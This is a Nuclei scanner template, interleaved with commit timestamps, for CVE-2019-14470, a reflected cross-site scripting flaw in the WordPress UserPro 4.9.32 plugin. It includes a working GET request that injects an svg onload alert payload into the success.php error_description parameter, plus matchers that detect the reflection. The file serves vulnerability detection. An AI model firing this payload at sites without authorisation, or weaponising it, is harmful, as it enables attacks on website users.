2021-07-11 01:06:14 +00:00
id : CVE-2019-14470
info :
2022-08-12 00:45:50 +00:00
name : WordPress UserPro 4.9.32 - Cross-Site Scripting
2021-07-11 01:06:14 +00:00
author : daffainfo
severity : medium
2022-08-12 00:45:50 +00:00
description : WordPress UserPro 4.9.32 is vulnerable to reflected cross-site scripting because the Instagram PHP API (v2) it relies on allows it via the example/success.php error_description parameter.
2021-08-18 11:37:49 +00:00
reference :
2021-07-11 04:42:41 +00:00
- https://wpscan.com/vulnerability/9815
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470
2022-05-17 09:18:12 +00:00
- http://packetstormsecurity.com/files/154206/WordPress-UserPro-4.9.32-Cross-Site-Scripting.html
- https://wpvulndb.com/vulnerabilities/9815
2022-08-12 00:45:50 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-14470
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-14470
cwe-id : CWE-79
2022-04-22 10:38:41 +00:00
tags : cve,cve2019,wordpress,xss,wp-plugin
2021-07-11 01:06:14 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E'
matchers-condition : and
matchers :
- type : word
words :
- "<svg/onload=alert(1)>"
part : body
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2022-08-12 00:45:50 +00:00
# Enhanced by mp on 2022/08/10